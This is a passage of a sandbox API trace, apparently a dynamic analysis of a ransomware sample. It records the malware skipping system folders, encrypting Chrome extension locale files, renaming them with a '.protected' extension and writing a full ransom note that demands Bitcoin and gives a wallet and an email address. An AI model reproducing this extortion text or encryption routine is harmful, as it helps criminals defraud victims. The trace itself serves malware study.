(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.722] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.722] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.722] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.722] CloseHandle (hObject=0x164) returned 1 [0078.722] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0078.722] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned 141 [0078.722] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0078.722] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0078.722] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*") returned 143 [0078.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.723] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.723] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.723] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.723] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.723] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.723] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\.") returned 143 [0078.723] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.724] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.724] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.724] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.724] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.724] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.724] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.724] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\..") returned 144 [0078.724] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.724] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.724] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.724] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0078.724] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.724] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.724] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.724] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.724] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0078.724] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.724] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0078.724] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.724] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0078.725] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.725] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0078.725] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.725] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0078.725] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.725] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.726] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.726] CloseHandle (hObject=0x168) returned 1 [0078.726] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.protected") returned 165 [0078.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.protected")) returned 1 [0078.726] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.726] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.726] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0078.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.727] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.727] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.727] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.727] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.727] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.727] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.727] CloseHandle (hObject=0x164) returned 1 [0078.728] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.728] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0078.728] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0078.728] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0078.728] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0078.728] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0078.728] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned 141 [0078.728] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0078.728] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0078.728] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*") returned 143 [0078.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.728] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.728] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.728] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.728] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.728] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.728] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\.") returned 143 [0078.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.728] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.728] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.728] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.728] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.728] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.728] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.728] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\..") returned 144 [0078.728] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.728] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.728] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.728] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0078.728] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.728] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.728] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.729] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0078.729] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0078.729] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0078.729] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.729] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0078.730] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.730] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0078.730] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.730] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.730] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.730] CloseHandle (hObject=0x168) returned 1 [0078.730] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.protected") returned 165 [0078.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.protected")) returned 1 [0078.730] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.730] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.731] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0078.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.731] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.731] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.732] lstrlenA 